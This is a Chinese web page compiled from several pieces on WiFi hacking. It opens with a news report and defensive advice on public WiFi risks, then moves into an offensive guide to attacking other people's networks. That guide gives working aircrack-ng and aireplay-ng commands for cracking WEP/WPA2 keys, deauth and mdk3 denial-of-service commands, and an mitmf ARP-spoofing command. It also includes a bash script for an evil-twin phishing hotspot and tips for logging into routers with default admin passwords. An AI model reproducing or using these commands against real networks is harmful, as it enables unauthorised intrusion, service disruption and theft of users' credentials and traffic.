简单的黑客技术_黑客技术入门让wfi

hacker|
207

黑客如何攻击公共wifi?

我国公共场所免费WiFi不断增多,然而,由于免费WiFi存在路由器和网络漏洞,成为黑客攻击的对象,导致网民个人隐私泄露、网银被盗等案例时有发生。

黑客攻击公共WiFi最常用三大招式:

1.域名劫持。

在公共的WiFi环境下,进入无线路由器的管理后台,并对域名系统进行修改。当使用者输入网址时,服务器直接把IP跳到黑客设置的钓鱼网站。

2.钓鱼WiFi。

黑客往往选择在繁华商业区构建一个不加密的WiFi,并把WiFi的名字起一个众所周知的热点名称,引诱网民“上钩”。

3.ARP(地址解析协议)欺骗。

黑客和使用者同时连接了同一个WiFi,使用者开始上网浏览,黑客则在其手机上打开了一款黑客软件。该黑客软件很快就进入路由器的WEB管理界面,并将使用者的手机信息读取出来。

如何防范信息泄露:

一是不要盲目地“见网就连”,防止钓鱼的虚假WiFi。

二是不要使用公共WiFi进行网购和网银操作,避免个人信息的泄露。当用户发现账户被劫持后,应在第一时间退出账户,随后退出WiFi。如果直接退网而不先退出账户,缓存的网络数据则不会被清空,将导致黑客可以继续操控用户。

黑客攻击公共WiFi有哪些“阴招”?

网络专家指出,黑客攻击免费WiFi,其技术门槛之低、操作之简便让人惊出冷汗,因此消费者免费上网必须谨慎。

随着我国公共场所免费WiFi的不断增多,蹭个网、转个账、淘个宝等,成为不少网民的习惯动作。然而,由于免费WiFi存在路由器和网络漏洞,也成为黑客攻击的对象,导致网民个人隐私泄露、网银被盗等案例时有发生。

利用简单技术,盗窃个人信息

北京锒先生用手机通过公共WiFi登陆一家网上银行,一小时后他的银行资金被17次转账或取现,损失3.4万元;陈先生在南京一酒店住宿时,连接不设密码的WiFi打了一晚上手机游戏,天亮时发现游戏账号里的装备全部消失……

近期,石家庄、扬州、大连等地连续发生网民财产损失案件。尽管当事人不同、上网地点不同,但其财产损失的原因相似,都是连接免费的WiFi。

网络专家指出,免费的WiFi很容易受到黑客攻击,个人隐私泄露是大概率事件,而网民对此却一无所知。“此类案件反映了当事人网络安全意识薄弱和防范技巧缺失。”艾媒咨询CEO张毅说,餐饮店、酒店、咖啡厅等普通商家是WiFi的高风险区。“一根网线加一台无线路由器组成的免费WiFi,往往‘后门’大开,没有安全防范设置,这为黑客打开了方便之门。”

某公司移动安全实验室工程师陈湘玲介绍,在公共场所接入免费WiFi的安全风险包括用户的社交软件账号、密码被劫持和恶意利用;手机或电脑中的文件及照片等个人信息泄露;用户网银和支付宝等移动支付的资金被盗刷等。根据2014年猎豹免费WiFi对全国8万个公共WiFi热点进行的抽样调查,有21%的公共热点存在风险,其中绝大多数WiFi热点加密方式不安全,包括黑客在内的任何一个人都可以侦听到该局域网内的数据通讯,如账号、密码、个人信息等。

公共WiFi,黑客如影随形

在某公司的WiFi风险实验室,陈湘玲向记者演示了黑客最常见的三大“阴招”。

域名劫持。在实验室,记者用手机连上了一个不设密码的WiFi后,输入正确的工商银行网站,跳出的网页却是个与之相似度很高的山寨钓鱼网站。

陈湘玲说,在当前的WiFi环境下,她可以进入无线路由器的管理后台,并对域名系统进行修改。当记者输入工行网址时,服务器直接把IP跳到她设置的工行钓鱼网站。

钓鱼WiFi。陈湘玲说,黑客往往选择在繁华商业区构建一个不加密的WiFi,并把WiFi的名字起为“CMCC”、“KFC”等众所周知的热点名称,引诱网民“上钩”。

值得关注的是,架设一个钓鱼虚假WiFi毫不费力。网络专家说,黑客只要把一个3G网卡插入到巴掌大的便携迷你无线路由器,就能释放WiFi信号。设置好无线路由和网络共享后,黑客“就能喝着咖啡守株待兔了。”

ARP(地址解析协议)欺骗。陈湘玲和记者各自用手机连接了同一个WiFi,记者登陆了自己的新浪微博开始浏览,陈湘玲则在其手机上打开了一款黑客软件。记者看到,该黑客软件很快就进入路由器的WEB管理界面,并将记者的手机信息读取出来。

陈湘玲在其手机上发出一条微博测试,不到5秒钟,记者手机上就显示了这条“新微博”。“这意味着,你在手机上的所有操作我都能一览无余。这样的会话劫持软件在网上可以轻易下载。”陈湘玲说。

增强风险意识,防范信息泄露

艾媒咨询CEO张毅认为,当前免费WiFi服务的接入标准不一,市场缺乏规范,安全隐患明显。一些公共WiFi热点无需办理任何手续,也没有安全检查措施,政府监管相对滞后,亟待引起重视。“通信管理部门应该建立公共WiFi的准入和审批备案制度,以保障用户信息和资金安全”,张毅说。

金山毒霸安全中心的调查显示,超过一半的网民不清楚公共场所接入免费WiFi存在安全隐患。记者在广州街头随机采访发现,多数网民不知道如何识别钓鱼网站以及防范黑客攻击。专家建议,用户登录公共WiFi时,一是不要盲目地“见网就连”,防止钓鱼的虚假WiFi;二是不要进行网购和网银操作,避免个人信息的泄露。“有的用户习惯于WiFi开关设置在打开状态,这会导致手机自动连接,存在很大风险。”陈湘玲说。

张毅表示,当用户发现账户被劫持后,应在第一时间退出账户,随后退出WiFi。如果直接退网而不先退出账户,缓存的网络数据则不会被清空,将导致黑客可以继续操控用户。

专家指出,公共WiFi的迅速发展,要求相应的监管制度与之配套,这需要通信管理部门、网络运营商、互联网公司和商家等方面的共同努力。“从目前来看,公共WiFi安全事件多为个案,但这并不代表大规模的公共网络事件不会发生。”张毅说。

(作者:田建川)

黑客怎么利用wifi盗取手机信息?应该如何防范?

黑客利用wifi盗取手机信息的方法:

一些路由器厂家在研发成品时,为了日后调试和检测更方便,会在产品上保留一个超级管理权限,一般情况下,这个超级管理权限是不容易被外人发现的,但一旦被黑客所发现并破解,就意味着黑客可以直接对路由器进行远程控制。

利用一款黑客软件,由软件进入路由器的WEB管理界面,所有连接了该WIFI的电子设备都被显示出来。如果对其中一台电脑上已登录的微博实施“劫持”,其手机上的黑客软件管理界面,就立即自动生成一个微博网址,只需点击,无需账号、密码,手机就自动登录到了网页版微博个人账户,并且可以自由发布和删改个人信息。

防止路由器被劫持的方法:

1、路由器管理网页登录账户、密码,不要使用默认的admin,可改为字母加数字的高强度密码;

2、WIFI密码选择WPA2加密认证方式,密码长度要在10位以上,最好是大小写字母、数字、特殊符号的组合,这样会大大提高黑客破解密码蹭网的难度;

3、路由器默认的管理IP修改为自己指定的特殊IP;开启路由器MAC地址过滤功能,只允许已知设备接入;

4、在设备中安装具有ARP局域网防护功能的安全软件,防止被黑客蹭网劫持;

5、常登录路由器管理后台,看看有没有不认识的设备连入了WIFI,如果有,及时将其清除;

6、不要随便告诉不可信人员你的无线密码;

7、移动设备不要“越狱”或ROOT,连接来路不明的无线网络;

8、关闭路由器WPS/QSS功能。

黑客怎么想的,怎么做的,如何通过wifi入侵公司

先破解wifi密码,这个密码指的是wifi的使用验证密码,这样黑客就可以加入这个无线网卡,黑客的设备也会成为无线网的一员。然后黑客会对连入无线网络的设备运用ARP欺骗、中间人攻击、嗅探、DNS欺骗等攻击手段,从而获得这些设备上的敏感信息(可以是公司信息也可以是帐号密码)。

黑客怎么修改Wi-Fi密码

修改不是你自己的wifi的wifi密码?首先你要连入这个wifi。

一般的思路是:选定一个要破解的wifi,使用网卡的监听模式抓取周围的无线网络数据包。其中,对我们最重要的数据包是:包含密码的包,也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。

要等用户连接/重连接wifi,运气不好也许要很长时间。

但是我们是不会等的,这不是耐心黑客该干的事。有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

抓到包含密码的包之后,就是本地暴力破解这个包了,把密码破解出来。破解的难易度看这个路由器设置的加密方式。

有了wifi密码,就能接入wifi。不过光连入wifi没用,因为路由器还有管理员密码。知道wifi密码只能上网,不能修改路由器的配置。不过大部分人,在第一次配置路由器的时候,只会配置wifi的密码,而懒得去改路由器的管理员密码,也就是说,管理员密码还是admin之类的通用密码。只要在连入wifi之后ipconfig(Linux下是ifconfig)看下网管的ip(通常是192.168.1.1或192.168.2.1),直接用浏览器去访问,尝试账号admin密码admin登进去就能改了。

如果人家改了管理员密码,想直接破解不太可能。就得从主人常用的那台登过路由器后台的电脑入手了。情况就又复杂很多了。

怎么攻击别人wifi?

1.保密性

我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。

OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。

WEP大概如下:

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02.ivs

WPA/WPA2大概如下:

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake

aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码

密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。

2.可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击

3.真实性

(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet

通过driftnet工具抓取目标浏览网页时的图片

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。

(2)伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。

4.完整性

篡改用户数据,在WIFI攻击这块貌似用处不大。

5.不可抵赖性

0条大神的评论

发表评论